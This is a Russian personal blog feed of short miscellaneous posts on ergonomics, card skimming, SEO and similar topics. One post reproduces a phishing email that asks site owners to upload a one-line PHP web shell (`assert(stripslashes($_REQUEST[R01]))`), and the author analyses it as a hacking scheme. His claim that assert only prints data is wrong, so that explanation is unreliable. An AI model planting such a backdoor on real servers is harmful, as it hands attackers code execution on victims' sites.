Писатель, маркетолог, дизайнер, психолог

Если вы часто работаете за компьютером:

  • Подберите мышку ровно по размеру кисти руки или используйте специальную мышь. Не покупайте дешевые беспроводные мышки, лучшие мыши обычно проводные игровые.
  • Немного ускорьте движение курсора мыши в настройках ОС — это позволит уменьшить количество движений кистью.
  • При работе с клавиатурой, угол сгиба руки в локте должен быть прямым (90°). Это достигается благодаря подбору подходящего стола и высоты стула/кресла
  • При работе с мышкой кисть должна быть прямой, и лежать на столе как можно дальше от края. Локоть при этом должен находиться на столе.
  • Желательно наличие специальной опоры для запястья (коврик для мыши, специальной формы клавиатура или компьютерный стол со специальными силиконовыми подушечками и т. п.)
  • Стул или кресло должны иметь подлокотники, иначе рука будет провисать.


20 марта в 0:00

Работают они также как обычные считыватели карт, расстояние 8-15 см.
Защита пока такая:
— носите карту, обернув в фольгу
— не храните на основной карте все свои сбережения — лучше использовать для этого отдельный счет, без карты и без доступа по телефону
— внимательнее смотрите на банкоматы: если заметите что-то необычное — воспользуйтесь другим банкоматом.
— периодически (раз в 2 недели) проверяйте списания со счета


2 февраля в 14:19

В первом издании книги оно звучит так: «Вместо ответа Хоттабыч, кряхтя, приподнялся на ноги, вырвал из бороды тринадцать волосков, мелко их изорвал, выкрикнул какое-то странное слово «лехододиликраскало» и, обессиленный, опустился прямо на опилки, покрывающие арену».

Слова заклинания совпадают с первой строкой иудейского литургического гимна «Леха доди» в ашкеназском произношении и означают «Иди, мой Возлюбленный, навстречу невесте». В более поздних советских изданиях этого слова нет. Вместо этого идет «выкрикнул какое-то странное и очень длинное слово». Кстати, нет и имени автора – вместо «Лазарь» стоит скромная буква Л.

А легендарные «Трах-тибидох» придумал редактор радиопостановки книги (1958 год).


2 февраля в 12:37

2-х дверный универсал Toyota RV-2. В производство так и не пошёл.


Ученые Гарвардского университета провели исследование данных пользователей онлайн-платформ с бесплатными образовательными курсами. Одним из главных преимуществ этих платформ считается доступность: чтобы овладевать знаниями нужен только интернет. Долгое время предполагалось, что сервисы помогут сократить разрыв в образовательном уровне разных слоев населения и демократизировать знания.

Но оказалось, что это не так. Исследователи проверили данные 68 онлайн-курсов Гарвардского университета и Массачусетского технологического института в период с 2012 по 2014 год. За это время их прошли 164 198 американцев в возрасте от 13 до 69 лет. Самая распространенная категория пользователей — студенты вузов, причем, как правило, из обеспеченных семей. Также онлайн-курсы крайне популярны среди тех, кто так или иначе занимается наукой и технологиями. Люди из бедных районов или с низким уровнем образования оказались в меньшинстве — у них попросту отсутствует тяга к знаниям.

Социально-экономический статус слушателей определялся исходя из трех параметров: уровень образования родителей, средний доход и среднее образование в районе проживания. Результаты работы выявили новую проблему, над которой нужно работать. Теперь ученые заинтересованы выявить связи между средой, в которой проживает человек, и его уровнем образования. Исследование полностью можно прочитать в журнале Science.

Если задуматься, обеспеченный человек меньше времени тратит на мысли о пропитании и выживании — отсюда появляется больше времени на образование. А если над ним ведут шефство — мотивации еще больше. Так что разрыв в образовании сократить не удастся без каких-либо социальных выплат.


1. В каких единицах измеряется святость?

2. Одинаковы ли усилия по освящению ведра воды и реки?

3. Почему освящение происходит ежегодно?

4. Из п.3 следует, что освящение имеет период полураспада, следовательно: Каков период полураспада святости?

5. Что произойдет с мусульманином, выпившим N–ное количество святой воды по ошибке?

6. Святость — есть величина константная или определенные качества священника могут повлиять на силу святости каким–либо образом?

7. Когда в данном месте святости становится больше, означает ли это, что, скажем, в Африке, святости убывает?


В частности, когда речь касается контрастности. Они думают, что если им видно — значит и другие увидят.

И речь даже не о том большинстве людей, у кого плохое зрение. Я говорю про обычные компьютеры и стандартную настройку яркости на мониторе или экране ТВ.

Даже, если люди заморачиваются с настройкой яркости — наиболее популярная настройка — для просмотра фильмов, и она не подразумевает возможность просмотра начальных светлых оттенков.

Приведу пример:

Подобные «засвеченные» работы чаще всего бывают недооценены именно из-за того, что ничего не видно.


P.S.: Чтобы быстро проверить яркость вашего монитора — проверьте, видите ли вы мелкозернистый серый фон этого сайта. Если нет — яркость экрана завышена.


Нашел довольно интересную статью с перечислением всех вариантов, как можно заменить меню «гамбургер»



В своей CMS «Движок» эту задачу я решил так: сразу после адреса сайта пишем слово add (англ. «добавить») — откроется добавление страницы.
Конечно, если вы ранее заходили в администрирование сайта по логину и паролю.

Минимум действий.


Получаю письмо. Тут надо заметить, что письма у меня смотрятся хоть и не через браузер, но почтовый клиент также показывает письма в HTML формате и не показывает реальный адрес отправителя (по-умолчанию). Поэтому ухищрения кульных хацкеров не были видны как на ладони (реальный адрес отправителя письма был info@r01l.ru — одна лишняя буква) и доходить до схемы «взлома» пришлось своим умом, анализируя присланное письмо.

Отправитель: "R01.RU"
Тема: Необходима активация домена [один из моих доменов]

Текст:

Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом [один из моих доменов] осуществляется лицом, указанным в качестве его администратора.Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7offau12fn0f83f.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех рабочих дней с момента получения настоящего письма и находиться на сервере до 28 декабря 2016 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
© АО "Регистратор Р01"
8-800-775-37-77,
8-495-616-2747


Что бросается в глаза?

То, что просят создать php-файл. Для проверки обычно достаточно и txt-файла.
Разберем код.
assert — это вывод проверки утверждения. По сути выведет на экран переданную инфу.
stripslashes — удаляет экранирование символов
остается $_REQUEST[R01] — вместо R01 могут написать что угодно. Это то, что передается php-йфалу через POST или GET запрос. И здесь не видно никакой защиты. Получается, что это простой незащищенный файл, который подвержен большинству уязвимостей, через обращение в переменной R01.

Узнал, что аналогичные письма приходят и от имени якобы РосКомНадзора :)

Т.е. цель «хакеров» — не дискриминация определенного сервиса, а временное получение доступа к сайтам.
Зачем?
Отжать домен таким образом не получится.
Удалять файлы обычно бесполезно — есть резервные копии.
Глумиться над сайтами, заменяя картинки — ребячество.
Получить секретную информацию — вряд ли получится, т.к. админ, который на это пойдет, вряд ли будет управлять крупным магазином.
Учитывая волну подобных писем — это не захват определенного сайта.
Остается одно — создание мусорных рекламных сайтов в папках на временно «захваченных» доменах.




10 января в 14:03

Дизайнер Н. Григорьев (ВНИИТЭ).



9 января в 11:15

Фотошоп.
Меню -> Изображение -> Коррекция -> Постеризация
3 или 2.


Если кто не понял — суть в том, какую монету можно использовать в Европе...
А 2 рубля — за 1 евро, но работает не везде.
Да, иной раз можно и сдачу получить из автомата...

Собрались в Европу — возьмите с собой нашу мелочь )


7 января в 15:10

Когда говорят SEO-продвижение — это тоже самое, что масло масляное, т.к. обычно эти слова означают одно и то же, несмотря на то, что по смыслу SEO относится к продвижению, а продвижение может быть и не SEO. Но для клиентов это не важно — им главное — получить прибыль от продвижения.

SEO — это в первую очередь текстовое наполнение. Т.е. тексты статей, описания артистов и услуг.
Также у каждой страницы есть:
  • TITLE (заголовок окна) — виден на вкладке окна в браузере. Мало влияет на продвижение, обычно совпадает с заголовком страницы.
  • KEYWORDS (ключевые слова) — видно только в коде страницы, доступно поисковым системам. С 2013 года неактуально, т.к. поисковые системы перестали учитывать этот параметр.
  • DESCRIPTION (описание) — видно только в коде страницы, доступно поисковым системам. Рекомендуется заполнять это поле для страниц, где много текста. Это мало влияет на продвижение, намного важнее — сам текст.

Если же говорить про тексты, есть базовые правила при их написании для SEO:
— важен заголовок, подбирается с учетом популярных поисковых запросов по статистике
— количество ключевых слов в тексте не должно быть больше 8% (высчитывается в Ворде по статистике количества слов)
— текст должен быть читабельным, т.е. написанным для людей.

Те, кто заявляет, что SEO хромает — обычно имеют в виду, что можно было бы подобрать DESCRIPTION для всех страниц более адекватно, например, взяв или сочинив одно предложение, которое полностью описывает содержание текста.

Второй тип SEO - закупать ссылки с сайтов вашего региона на ссылочных биржах. Этим я также занимаюсь. Результат даёт не сразу, минимальный через месяц, хороший — через полгода, год. Постепенно повышает посещаемость.

Третий тип продвижения — «пройти» по каталогам, блогам и сайтам, т.е. оставить там свою ссылку. Этот тип практически «умер», т.к. поисковые системы перестали учитывать ссылки с ссылочных «помоек». Несмотря на это, всё еще этот тип продвижения многие продолжают предлагать. Не рекомендую.

Четвертый тип продвижения — каталог или магазин с карточками товара. Очень желательно в этом случае указывать реальную цену.

Пятым типом продвижения иной раз могут назвать скрытую рекламу в текстах. Но это все-таки реклама, а SEO — это повышение места в поисковой выдаче.

Других вариантов нет.



© 2013—2017, Влад Мерк
Почта: 13i [гав] list.ru
Контакты
Работает на CMS «Движок»
Индекс цитирования